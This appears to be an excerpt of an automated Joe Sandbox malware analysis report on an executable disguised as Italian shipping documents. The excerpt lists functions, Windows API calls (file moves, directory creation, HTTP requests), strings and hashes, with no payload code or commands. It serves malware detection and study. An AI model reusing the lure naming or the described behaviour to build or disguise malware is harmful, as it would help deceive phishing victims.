                        • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe
                        • API String ID: 3648134473-2789728585
                        • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                        • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                        • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                        • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                        Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                        • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                        • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                        • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                        Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,0040F545,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,004A90E8,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,?,0040F545), ref: 0041013C
                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                        • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                        • MoveFileW.KERNEL32(?,?), ref: 00453932
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: File$AttributesFullMoveNamePathlstrcmpi
                        • String ID:
                        • API String ID: 978794511-0
                        • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                        • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                        • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                        • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                        Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                        • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                        • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                        • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                        Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ClearVariant
                        • String ID:
                        • API String ID: 1473721057-0
                        • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                        • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                        • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                        • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                        Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: _memmove$_memcmp
                        • String ID: '$\$h
                        • API String ID: 2205784470-1303700344
                        • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                        • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                        • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                        • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                        Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                        • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                        • VariantClear.OLEAUT32 ref: 0045EA6D
                        • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                        • __swprintf.LIBCMT ref: 0045EC33
                        • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                        Strings
                        • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Variant$InitTime$ClearCopySystem__swprintf
                        • String ID: %4d%02d%02d%02d%02d%02d
                        • API String ID: 2441338619-1568723262
                        • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                        • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                        • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                        • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                        Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                        Download Yara Rule
                        APIs
                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                        • Sleep.KERNEL32(0000000A), ref: 0042C67F
                        • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                        • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Interlocked$DecrementIncrement$Sleep
                        • String ID: @COM_EVENTOBJ
                        • API String ID: 327565842-2228938565
                        • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                        • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                        • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                        • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                        Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                        Download Yara Rule
                        APIs
                        • VariantClear.OLEAUT32(?), ref: 0047031B
                        • VariantClear.OLEAUT32(?), ref: 0047044F
                        • VariantInit.OLEAUT32(?), ref: 004704A3
                        • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                        • VariantClear.OLEAUT32(?), ref: 00470516
                          • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                        • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                          • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                        • VariantClear.OLEAUT32(00000000), ref: 0047060D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Variant$Clear$Copy$CallDispFuncInit
                        • String ID: H
                        • API String ID: 3613100350-2852464175
                        • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                        • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                        • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                        • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                        Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                        Download Yara Rule
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                        • DestroyWindow.USER32(?), ref: 00426F50
                        • UnregisterHotKey.USER32(?), ref: 00426F77
                        • FreeLibrary.KERNEL32(?), ref: 0042701F
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 4174999648-3243417748
                        • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                        • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                        • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                        • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                        Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                        • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                        • String ID:
                        • API String ID: 1291720006-3916222277
                        • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                        • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                        • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                        • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                        Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                        • IsMenu.USER32(?), ref: 0045FC5F
                        • CreatePopupMenu.USER32 ref: 0045FC97
                        • GetMenuItemCount.USER32(?), ref: 0045FCFD
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                        • String ID: 0$2
                        • API String ID: 93392585-3793063076
                        • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                        • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                        • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                        • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                        Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                        • VariantClear.OLEAUT32(?), ref: 00435320
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                        • VariantClear.OLEAUT32(?), ref: 004353B3
                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                        • String ID: crts
                        • API String ID: 586820018-3724388283
                        • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                        • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                        • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                        • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                        Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,0040F545,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,004A90E8,C:\Users\user\Desktop\AWB_5771388044 Documenti di spedizione.exe,?,0040F545), ref: 0041013C
                        • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                        • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                        • _wcscat.LIBCMT ref: 0044BCAF
                        • _wcslen.LIBCMT ref: 0044BCBB
                        • _wcslen.LIBCMT ref: 0044BCD1
                        • SHFileOperationW.SHELL32(?), ref: 0044BD17
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                        • String ID: \*.*
                        • API String ID: 2326526234-1173974218
                        • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                        • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                        • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                        • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                        Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                        • _wcslen.LIBCMT ref: 004335F2
                        • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                        • GetLastError.KERNEL32 ref: 0043362B
                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                        • _wcsrchr.LIBCMT ref: 00433666
                          • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1744350070.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1744338718.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744388738.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744405784.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744422191.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744436147.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1744473882.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_AWB_5771388044 Documenti di spedizione.jbxd
                        Similarity
                        • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                        • String ID: \
                        • API String ID: 321622961-2967466578
                        • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                        • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                        • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                        • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
